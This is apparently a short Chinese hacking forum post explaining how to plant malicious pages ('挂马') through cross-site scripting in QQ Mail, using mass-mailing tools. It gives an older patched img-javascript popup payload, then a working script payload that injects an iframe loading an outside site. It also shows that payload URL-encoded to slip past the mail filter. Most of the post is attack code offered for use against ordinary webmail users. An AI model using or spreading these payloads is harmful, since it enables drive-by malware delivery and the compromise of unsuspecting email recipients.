利用利用QQ群发邮件跨站挂马

记得以前搞博客跨站挂马！
是利用下面这段弹窗的：
<img src=javascript:open('http://www.slenk.net','幽月','width=400,height=300')>现在漏 洞被封啦！

下面搞QQ邮箱挂马：
大家可以利用QQ群发工具或软件来利用：
这是新漏洞！
这是跨站的代码。可以直接支持JS  但QQ有过滤空格，相信大家应该明白这一点。空格被转换成“&nbsp;”    “&nbsp;”在HTML下代表空格。

源代码：
<script>document.write("<iframe src=http://www.slenk.net width=100% height=400></iframe><br>十三教程测试。")</script><script>

JS加密网：
http://www.webmasterhome.cn/tool/Encode.asp

加密后的代码：
<script>document.write(unescape('%3Cscript%3Edocument.write%28%22%3Ciframe%20src%3Dhttp%3A//www.slenk.net%20width%3D100%25%20height%3D400%3E%3C/iframe%3E%3Cbr%3E%u5341%u4E09%u6559%u7A0B%u6D4B%u8BD5%u3002%22%29%3C/script%3E%3Cscript%3E'))</script>